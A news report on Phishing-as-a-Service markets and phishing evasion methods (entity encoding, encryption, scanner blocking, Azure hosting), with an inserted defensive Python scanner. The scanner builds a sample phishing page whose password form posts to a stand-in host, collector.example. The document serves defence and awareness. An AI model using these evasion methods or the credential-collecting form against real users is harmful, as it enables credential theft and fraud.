Phishing-as-a-Service Fuels Evasion Methods, Email Scam Growth

With much of the world’s corporate communication being done through email, scammers increasingly target corporate users with phishing scams that allow them to steal credentials that can be used for BEC scams, social engineering, or to steal corporate secrets.

In the past, phishing campaigns required threat actors to have some technical knowledge to utilize phishing kits, compromise sites to host the phishing landing pages that are used to steal credentials, and to create realistic spam campaigns.

To overcome this barrier to entry, new criminal sites are being developed that provide Phishing-as-a-Service: a phishing kit plus hosting for the phishing forms at a very low cost. This allows would-be criminals with little technical knowledge to easily get started with their own phishing campaigns.

Phishing-as-a-Service drives growth

Instead of hacking into servers to host landing pages and developing their own phishing kits, criminals can turn to new Phishing-as-a-Service (PhaaS) sites where they select from a variety of phishing landing pages, bundled with one month of hosting.

The phishing templates that are available include SharePoint, Office 365, LinkedIn, OneDrive, Google, Adobe, Dropbox, DocuSign, and many more. These templates range from $30 to $80 and include one month of hosting for the page.

Available Phishing Landing Page Styles

According to a new report by cloud-based security provider Cyren, these new services have enabled the rapid growth of new phishing campaigns being created.

“Today’s reality is that we are seeing more evasive phishing campaigns in the hands of more attackers at less effort and lower cost than in the past, as technically sophisticated phishing attack developers have adopted a SaaS business model to let even the most amateur criminal wanna-be spoof targeted web sites with a high degree of authenticity and embedded evasive tactics,” stated the report by Cyren.

For example, Cyren security researcher Magni Sigurdsson shared with BleepingComputer a PhaaS offering that describes itself as a “private service provider” for the hosting of spam pages.

“We are a private service provider that giving client solution for the hosting spam page. What we do is we warranty our customer link host 1 month, we provide client with 3 link as backup. The client can use two link as backup if the link die or reported as phishing. Customer can come back and report 3 of the link are die or reported phishing (RED) and we provide another 3 link as replacement”

These services guarantee that the phisher’s landing pages will stay alive for one month. Whether or not this is true or if they swap from one compromised host or cloud provider to another as they are detected is unknown.

Using a PhaaS service, scammers only need to focus on sending the spam emails and no longer have to worry about setting up phishing kits or hacking sites to host their landing pages.

To make it easier to conduct the spam campaigns, the PhaaS services also sell email lists, or what they call leads, that can be used to target a certain demographic of users.

Spam Email Lists

For example, the “FRA France Leads” package shown above is described as containing “1.5 millions plus France leads” that are “country verified and genuine”.

Pricing for these leads is not readily available; buyers need to contact the site owner via ICQ to get a quote.

Advanced methods and increasing evasion

As Phishing-as-a-Service sites have helped drive the growth of phishing campaigns, users and security software have become better at detecting them. As a result, threat actors have had to come up with more innovative methods to get people to click on the enclosed links and to evade detection.

For example, we have recently seen phishing campaigns pretending to be mail account deletion notifications, undelivered mail prompts, and fake voice mail messages. All of these emails are designed to drive the user to click on the enclosed link, which leads to a landing page asking for login credentials.

Voice Mail Phishing Scam

In order to avoid detection by machine learning and security software, phishing campaigns are increasingly utilizing evasion techniques.

According to Cyren, 87% of the phishing campaigns that they detect now use evasion techniques to try to bypass detection. The evasion techniques being used are described below:

HTML character encoding: This technique encodes the HTML of the phishing page (for example as character references) so that it appears as gibberish to automated scanning engines that match on the raw bytes, while a web browser or email client decodes it and renders it normally.

Content encryption: Instead of encoding the HTML, this technique actually encrypts the data and then uses JavaScript to decrypt it when viewed in a web browser.

Inspection blocking: Phishing kits block various IP addresses, browser user agents, or referers from accessing the landing pages. This is an attempt to stop automated systems used by Google, antivirus engines, or security providers from reading the page. It is commonly done using .htaccess files with prebuilt signatures that redirect certain visitors to another site, as shown below.

htaccess File

URLs in attachments: Instead of placing the phishing landing page URLs in the email body, the attackers put them inside attachments, either attached directly to the email or hosted on other services.

Content injection: This technique uses a legitimate but compromised site that contains a script that redirects targeted users to the phishing landing page.

Legitimate cloud hosting: Phishing scams are increasingly using legitimate cloud service providers such as Azure to host their landing pages. Doing so allows the landing pages to be hosted on Microsoft-branded URLs such as to make the scam pages look legitimate. Furthermore, these pages are served over HTTPS with a certificate owned by Microsoft.

This is especially useful for landing pages that attempt to steal credentials for Microsoft services such as Microsoft Accounts, OneDrive, Outlook, and Office 365.

Azure Hosted Landing Page
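The HTML character encoding evasion above defeats scanners that match keywords on the raw bytes of a page. The following Python is an added example (not code from the article or from Cyren) of the defensive counterpart: decode character references the way a browser would before looking for credential-harvesting indicators, and treat an unusually high share of encoded characters as a signal in itself. The sample page and the `collector.example` form target are constructed for this example.

```python
import html
import re

CREDENTIAL_KEYWORDS = ("password", "sign in", "office 365")
ENTITY_RE = re.compile(r"&(?:#\d+|#x[0-9a-fA-F]+|[a-zA-Z]+);")
PASSWORD_FIELD_RE = re.compile(r"<input[^>]*type\s*=\s*[\"']?password", re.I)
FORM_ACTION_RE = re.compile(r"<form[^>]*action\s*=\s*[\"']([^\"']+)", re.I)


def encode_as_entities(text: str) -> str:
    """Write every character as a decimal character reference (&#NNN;)."""
    return "".join(f"&#{ord(c)};" for c in text)


# Constructed sample landing page: the visible wording and the password
# field's type attribute are entity-encoded, so a byte-level keyword match
# never sees the strings "Office 365" or "password".
SAMPLE_PAGE = (
    "<html><body><h1>" + encode_as_entities("Sign in to Office 365") + "</h1>"
    '<form method="post" action="https://collector.example/post.php">'
    '<input type="email" name="user">'
    '<input type="' + encode_as_entities("password") + '" name="pw">'
    "</form></body></html>"
)


def entity_ratio(raw: str) -> float:
    """Share of the document's characters that belong to character references."""
    encoded = sum(len(m.group(0)) for m in ENTITY_RE.finditer(raw))
    return encoded / len(raw) if raw else 0.0


def scan(raw: str) -> dict:
    """Compare a naive raw-byte scan with a scan of the rendered (decoded) page."""
    naive_hits = [k for k in CREDENTIAL_KEYWORDS if k in raw.lower()]
    rendered = html.unescape(raw)  # what the browser or mail client displays
    rendered_hits = [k for k in CREDENTIAL_KEYWORDS if k in rendered.lower()]
    has_password_field = PASSWORD_FIELD_RE.search(rendered) is not None
    form_actions = FORM_ACTION_RE.findall(rendered)
    ratio = entity_ratio(raw)
    # A password form plus credential wording, or a password form hidden
    # behind heavy entity encoding, is worth flagging for review.
    suspicious = has_password_field and (bool(rendered_hits) or ratio > 0.3)
    return {
        "naive_hits": naive_hits,
        "rendered_hits": rendered_hits,
        "has_password_field": has_password_field,
        "form_actions": form_actions,
        "entity_ratio": ratio,
        "suspicious": suspicious,
    }
```

On the sample page the naive scan finds nothing, while the decoded scan finds the password field, all three keywords, and the off-site form action.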

These techniques appear to be working: reports indicate that phishing campaigns increased by 17% in the first quarter of 2019, that 25% of phishing emails bypass Office 365 security, and that the criminals are raking in a lot of profit.
